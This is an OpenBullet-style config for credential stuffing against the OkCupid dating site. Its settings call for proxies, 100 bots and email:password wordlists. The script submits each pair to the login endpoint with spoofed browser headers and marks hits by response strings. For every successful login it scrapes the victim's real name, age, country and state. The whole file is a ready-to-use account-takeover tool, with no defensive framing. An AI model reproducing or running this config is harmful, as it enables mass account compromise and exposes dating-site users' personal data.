[SETTINGS]
{
  "Name": "OkCupid",
  "SuggestedBots": 100,
  "LastModified": "2019-03-17T23:27:31.7444275+01:00",
  "AdditionalInfo": "",
  "Author": "Fairy#6869",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Login REQUEST POST "https://www.okcupid.com/login" AutoRedirect=FALSE 
  CONTENT "okc_api=1&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://www.okcupid.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Referer: https://www.okcupid.com/login" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
#Keys KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "That email or password is incorrect" 
  KEYCHAIN Success OR 
    KEY "status\" : 0" 
#Profile REQUEST GET "https://www.okcupid.com/home" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://www.okcupid.com/login" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
#Name PARSE "<SOURCE>" LR "realname\" : \"" "\"" Recursive=FALSE -> CAP "Name" "" "" 
#Age PARSE "<SOURCE>" LR "\"age\" : " "," Recursive=FALSE -> CAP "Age" "" "" 
#Tag PARSE "<SOURCE>" LR "location_country\" : \"" "\"" Recursive=FALSE -> CAP "Localtion" "" "" 
#ZIP_Code PARSE "<SOURCE>" LR "location_state\" : \"" "\"" Recursive=FALSE -> CAP "ZIP" "" "" 
